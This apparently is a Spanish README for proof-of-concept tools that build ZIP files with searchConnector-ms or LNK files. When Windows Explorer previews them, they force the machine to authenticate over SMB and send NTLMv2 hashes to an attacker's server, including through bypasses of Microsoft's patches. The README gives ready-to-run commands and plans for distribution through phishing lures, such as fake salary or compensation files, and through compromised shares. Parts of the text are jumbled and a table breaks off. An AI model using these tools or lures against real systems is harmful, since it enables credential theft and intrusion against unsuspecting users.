
Divulgación de Hash NTLMv2-SSP de Cero Clic en el Explorador de Archivos de Windows
Haga clic en la imagen de arriba para ver la demostración de la vulnerabilidad
El problema de seguridad fundamental reside en el procesamiento automático por parte del Shell de Windows de rutas UNC incrustadas dentro de formatos de archivo específicos durante las operaciones de vista previa. Cuando los usuarios abren archivos ZIP que contienen archivos especialmente diseñados, el Explorador de Windows resuelve automáticamente las rutas UNC sin el consentimiento del usuario, iniciando intentos de autenticación SMB y exponiendo los hashes NTLMv2-SSP a servidores controlados por el atacante.
Archivo: ntlm-disclosure-poc.py
Esta implementación inicial explota los archivos SearchConnector de Windows (.searchConnector-ms), que son archivos de configuración XML que definen ubicaciones de búsqueda para el Explorador de Windows. La vulnerabilidad se activa cuando Windows procesa automáticamente la ruta UNC incrustada en el elemento simpleLocation durante la operación de vista previa del archivo ZIP.
Características Técnicas:
searchConnectorDescriptionArchivo: patch_bypass.ps1
Esta técnica mejorada aborda el parche inicial de Microsoft aprovechando las propiedades de los archivos LNK. El ataque explota el comportamiento del Explorador de Windows al obtener metadatos de iconos y resolver rutas de destino durante la vista previa de archivos ZIP, manteniendo al mismo tiempo el vector de explotación sin clic mediante una configuración cuidadosa de las propiedades.
Características Técnicas:
TargetPath3.6+colorama5.1+Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser# Uso básico
python ntml-disclosure-poc.py 192.168.1.100
# Con archivo de salida personalizado
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip
# Ejemplo de salida
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip
Parámetros
target (obligatorio): Dirección IP o nombre de host de destino
-o, --output: Nombre de archivo de salida personalizado para el paquete ZIP
# Uso básico - El archivo LNK se elimina automáticamente
.\bypass.ps1 -IP 192.168.1.100
# Conservar el archivo LNK para distribución externa
.\bypass.ps1 -IP 192.168.1.100 -KeepLnk
# Nombre de señuelo y recurso compartido personalizados
.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName" -KeepLnk
# Especificar directorio de salida
.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk
Parámetros
-IP (obligatorio): Dirección IP del servidor SMB de destino
-Share: Nombre del recurso compartido SMB (por defecto: 'share')
-File: Nombre del archivo de destino (por defecto: 'payload.exe')
-Lure: Nombre de archivo de ingeniería social (por defecto: 'Your_File_For_Payload_Here')
-OutDir: Directorio de salida (por defecto: directorio actual)
-KeepLnk: Conservar el archivo LNK después de crear el ZIP
graph TD
A[🔴 CVE-2025-24054<br/>Vulnerabilidad Inicial] --> B[🛡️ Parche de Microsoft]
B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
C --> D[🛡️ Parche de Microsoft]
D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
E --> F[🔴 Estado Actual<br/>Explotación Activa]
style A fill:#ffcccc
style C fill:#ffddcc
style E fill:#ffffcc
style F fill:#ccffcc
📨 Escenario 1: Distribución Directa de ZIP
# Crear payload ZIP
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"
# Vectores de distribución:
# - 📧 Adjuntos de correo electrónico con señuelos de ingeniería social
# - ☁️ Servicios de intercambio de archivos comprometidos
# - 🌐 Colocaciones en recursos compartidos de red en entornos empresariales
🔄 Escenario 2: Transferencia de Archivos LNK
# Crear y conservar archivo LNK para despliegue en múltiples equipos
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk
# Despliegue entre equipos:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# Distribución basada en web a través de sitios comprometidos
🎯 Escenario 3: Ingeniería Social Dirigida
.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk
- Grupo y Contacto: t.me/initial_persistence
- Correo electrónico: [email protected]
| Vector | Mecanismo de Activación | Interacción del Usuario | Estado del Parche |
|---|
| 🔗 SearchConnector | Análisis XML + resolución UNC | Abrir ZIP | 🛡️ Parcheado |
| 📎 LNK TargetPath | Obtención de metadatos de iconos | Abrir ZIP |